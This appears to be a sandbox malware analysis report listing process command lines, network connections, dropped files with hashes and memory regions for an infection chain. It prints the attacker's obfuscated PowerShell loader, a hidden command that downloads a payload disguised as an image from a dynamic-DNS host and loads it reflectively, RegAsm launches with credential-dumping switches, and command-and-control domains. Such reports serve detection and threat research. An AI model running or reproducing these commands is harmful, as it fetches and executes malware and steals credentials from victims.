≪ ㏴JwBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cwBh≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴aQB2≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴fQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴H0≩ ⫻ ㏤ ≪ ㏴';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('≩ ⫻ ㏤ ≪ ㏴','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$link = 'http://servidorwindows.ddns.com.br/Files/vbs.jpeg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('dnlib.IO.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.BNRT/88/531.291.371.701//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm','desativado')) } }"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\vnpdpdqccvpmiaqbmzkkghvqxevktzhde"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\givwq"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\ikiorfmye"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.190.18.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.201.86.20.in-addr.arpa | udp |
| US | 107.173.192.135:80 | 107.173.192.135 | tcp |
| US | 8.8.8.8:53 | 135.192.173.107.in-addr.arpa | udp |
| US | 8.8.8.8:53 | servidorwindows.ddns.com.br | udp |
| BR | 191.55.76.236:80 | servidorwindows.ddns.com.br | tcp |
| US | 8.8.8.8:53 | 236.76.55.191.in-addr.arpa | udp |
| US | 107.173.192.135:80 | 107.173.192.135 | tcp |
| US | 8.8.8.8:53 | wemberdag.duckdns.org | udp |
| MY | 103.186.116.99:31388 | wemberdag.duckdns.org | tcp |
| US | 8.8.8.8:53 | 99.116.186.103.in-addr.arpa | udp |
| MY | 103.186.116.99:31388 | wemberdag.duckdns.org | tcp |
| US | 8.8.8.8:53 | geoplugin.net | udp |
| NL | 178.237.33.50:80 | geoplugin.net | tcp |
| US | 8.8.8.8:53 | 50.33.237.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
Files
memory/1268-0-0x00000000710EE000-0x00000000710EF000-memory.dmp
memory/1268-1-0x0000000000D20000-0x0000000000D56000-memory.dmp
memory/1268-2-0x00000000710E0000-0x0000000071890000-memory.dmp
memory/1268-3-0x0000000004F00000-0x0000000005528000-memory.dmp
memory/1268-4-0x0000000004B40000-0x0000000004B62000-memory.dmp
memory/1268-6-0x0000000004E50000-0x0000000004EB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vwh4c4yg.f1y.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1268-5-0x0000000004DE0000-0x0000000004E46000-memory.dmp
memory/1268-16-0x0000000005630000-0x0000000005984000-memory.dmp
memory/1268-17-0x0000000005AB0000-0x0000000005ACE000-memory.dmp
memory/1268-18-0x0000000005B60000-0x0000000005BAC000-memory.dmp
memory/1268-31-0x00000000710E0000-0x0000000071890000-memory.dmp
memory/1268-19-0x0000000006CC0000-0x0000000006CF2000-memory.dmp
memory/1268-21-0x000000006DB00000-0x000000006DE54000-memory.dmp
memory/1268-32-0x0000000006C80000-0x0000000006C9E000-memory.dmp
memory/1268-20-0x000000006D9A0000-0x000000006D9EC000-memory.dmp
memory/1268-33-0x0000000006D90000-0x0000000006E33000-memory.dmp
memory/1268-34-0x00000000710E0000-0x0000000071890000-memory.dmp
memory/1268-35-0x00000000074C0000-0x0000000007B3A000-memory.dmp
memory/1268-36-0x0000000002860000-0x000000000287A000-memory.dmp
memory/1268-37-0x0000000006EC0000-0x0000000006ECA000-memory.dmp
memory/1268-38-0x00000000070D0000-0x0000000007166000-memory.dmp
memory/1268-39-0x0000000007030000-0x0000000007041000-memory.dmp
memory/1268-40-0x0000000007060000-0x000000000706E000-memory.dmp
memory/1268-41-0x0000000007070000-0x0000000007084000-memory.dmp
memory/1268-42-0x00000000070B0000-0x00000000070CA000-memory.dmp
memory/1268-43-0x00000000070A0000-0x00000000070A8000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\4kx3h1b1\4kx3h1b1.cmdline
| MD5 | 9173ea2c6e60d7e7013e90301146eb97 |
| SHA1 | 90aa77a27469dbba2552fa244d90ff43bc75edb0 |
| SHA256 | 15d63d6d23dabcd2012954923fbbb1bc991f49a303398965d93bb02fd8d2a236 |
| SHA512 | 409985c3cf8b1dd93fce47fd522da2229dbe33078a5c02201b62b1af7679eee9c90743d34ea33264c78019e83d7dc1360efa96661ed82c155669e00971904542 |
\??\c:\Users\Admin\AppData\Local\Temp\4kx3h1b1\4kx3h1b1.0.cs
| MD5 | d71dc34ff8dbecd13f179ed952a841d5 |
| SHA1 | 78c3b0d410495a39154fbd26663468d6e5de5768 |
| SHA256 | 19b4037d5d9fa1532eb40ab0f16ad5a5c96cb3d9d3ab27b3e4e82ea74f3cf175 |
| SHA512 | 2b6397a38038caa9b412460801b007615461db4f8e24a8896f17cad90bc5d50286682387cc524aee6c3a38172d9932a125aef07c5ebdcc406ef7203a577aa84f |
\??\c:\Users\Admin\AppData\Local\Temp\4kx3h1b1\CSC8A85977435C44FDE89D0A35EC9FA1467.TMP
| MD5 | 41acd61e2e83a5fd56b1293c4167bcae |
| SHA1 | 8c8baaaba80c34db413807a6484ec15b43e37611 |
| SHA256 | c638114c1cdb235b4081d2bfce54854d4cac747e14a3913cff0c900f9e2c8675 |
| SHA512 | c3a962da8363ffa57fecc8f46e4feff4d102ee40431c0c6fc2c7a58c5eb5f5e61097c8d5d3d1500722d42aacfa6b8d03bcfb92d271d3bcac87f53525985f6905 |
C:\Users\Admin\AppData\Local\Temp\RES89B2.tmp
| MD5 | 1e78cc30f119d4f8e3f6731de8a6f795 |
| SHA1 | 6944fbc747ad100117827ea80f18e42450e7bdf7 |
| SHA256 | 599b151d6ebe1fa03335bd528ff402d8ceb9bd2014a68a16c48f2f27ad413ddf |
| SHA512 | a3005e8270ef62b1f51e21a208156e76c1e62d35bef3eccd5bd8bea543a7adaa23b572efa151e87cf29eb6b1f4ce6daaf20fd38e83c5eecaf0c2f31d1de2f074 |
C:\Users\Admin\AppData\Local\Temp\4kx3h1b1\4kx3h1b1.dll
| MD5 | 69f0fc652690f227ace9111ed7af6c08 |
| SHA1 | 54b3d492fd11f7fe7438417ab9163e0bc25dc583 |
| SHA256 | 9a77f8d37510cf581aff135c6a06fb993c03a3f52e4993bbd99469c8307e3df5 |
| SHA512 | 8a7d3938f98b55ddfe44fb106d2c83c9373250ed41f2df4d0a496cfdb2d91b2f31a44917af0814bfc4f78e458616d6b1cbc84de38a284658a50ddf281c35a756 |
memory/1268-56-0x00000000070A0000-0x00000000070A8000-memory.dmp
memory/1268-62-0x0000000007340000-0x0000000007362000-memory.dmp
memory/1268-63-0x00000000080F0000-0x0000000008694000-memory.dmp
C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS
| MD5 | 7788462fff77921361629f1053e761ec |
| SHA1 | 9414413ddaa18d38c3f7cd7119e1958e8afcb5df |
| SHA256 | fc4746b756fb20e572af314479447accf175c9eddfac1ea9b73326c2f410a753 |
| SHA512 | e4a138ad53a31d60c6db73da16ceb4f15d9d40639b72e1c5e872492b7a25aa32ad7ed8aacb64bc9379a735c49786a35edf200e652876f70e3009aba6326abbc5 |
memory/1268-69-0x00000000710E0000-0x0000000071890000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | 9faf6f9cd1992cdebfd8e34b48ea9330 |
| SHA1 | ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e |
| SHA256 | 0c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953 |
| SHA512 | 05b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 9de382fd4dc20d3b76c2deb3363e79b2 |
| SHA1 | bb54d449fda9c8e35771a8aaccc59ce0cb6d00a8 |
| SHA256 | fd0e7351178daa940495f1efdb5d7c401f688b57d1b288dc4a7bcf1329f68573 |
| SHA512 | 8a52b0cbc3ee6fce0d0d36efb4f274fbf72f5599aceffc537c2380cd35a8ac1dec5f5e7d18e3a906977d554b196247b9094ee3fcabb654d6242d75c7e3287667 |
memory/3472-90-0x0000000007550000-0x0000000007672000-memory.dmp
memory/3472-91-0x0000000007710000-0x00000000077AC000-memory.dmp
memory/1928-92-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1928-94-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1928-96-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1928-97-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1928-100-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1928-101-0x0000000000400000-0x0000000000482000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 7e78ef69666be8b8361e3c7acf886947 |
| SHA1 | c7879d03318d9f5c8bc560233650dd3aa125f8cc |
| SHA256 | 68b36c239c95ea820abe199f6e546706b1b13dfdc1b18b2bf3918654924a39c0 |
| SHA512 | ea70fe9e86a5f1c4d34d879d564842e1dd5c45cdebd11f1636b39d6cc4d6c5c550f6307571b9f44b9f39c069604d129274d6dd2795115ea90cc383fa31039736 |
memory/1928-105-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1928-104-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1928-106-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1928-107-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1928-109-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1928-110-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1928-111-0x0000000000400000-0x0000000000482000-memory.dmp
memory/4312-112-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2780-113-0x0000000000400000-0x0000000000462000-memory.dmp
memory/3612-114-0x0000000000400000-0x0000000000424000-memory.dmp
memory/2780-115-0x0000000000400000-0x0000000000462000-memory.dmp
memory/3612-120-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4312-122-0x0000000000400000-0x0000000000478000-memory.dmp
memory/2780-121-0x0000000000400000-0x0000000000462000-memory.dmp
memory/3612-119-0x0000000000400000-0x0000000000424000-memory.dmp
memory/4312-118-0x0000000000400000-0x0000000000478000-memory.dmp
memory/4312-116-0x0000000000400000-0x0000000000478000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\vnpdpdqccvpmiaqbmzkkghvqxevktzhde
| MD5 | a7e181f6aa185be0ab0ca68b30406fe6 |
| SHA1 | 58c86162658dc609615b8b6400f85c92506dfdc8 |
| SHA256 | c3071dc55b94db225d9c0f2c1b21c7e8f27dbfd168b85b7d618d8d19950e7ff2 |
| SHA512 | 49969eb10e0bf7925940eb7374451f811658ef9ccfb83b86fb337c4d06c3ba17eb0181f598d9e0ec9ca25bfaf644209ac47b73d62ac924e73d03a4dcf8f8dd0f |
memory/1928-129-0x0000000010000000-0x0000000010019000-memory.dmp
memory/1928-133-0x0000000010000000-0x0000000010019000-memory.dmp
memory/1928-132-0x0000000010000000-0x0000000010019000-memory.dmp
memory/1928-134-0x0000000000400000-0x0000000000482000-memory.dmp
C:\Users\Admin\AppData\Roaming\logs\logs.dat
| MD5 | 1ad97e27142176094ccb89be4eebc6ef |
| SHA1 | a0600f05c21572e5240cfa3871aa08b24d2daa4f |
| SHA256 | bfb7c5f699b66458ab201aa9bceb2b768e25b91dfc8b7a70f196e709b94b984a |
| SHA512 | 434e448772bdad81682738c003f44b5b0cc1b2f6308e25464efb5be7dadb8302e27a1dd3d938c9857b5a422a53fb86056694484b0c398eb6eeb90404d735841f |
memory/1928-140-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1928-141-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1928-148-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1928-149-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1928-156-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1928-157-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1928-164-0x0000000000400000-0x0000000000482000-memory.dmp
memory/1928-165-0x0000000000400000-0x0000000000482000-memory.dmp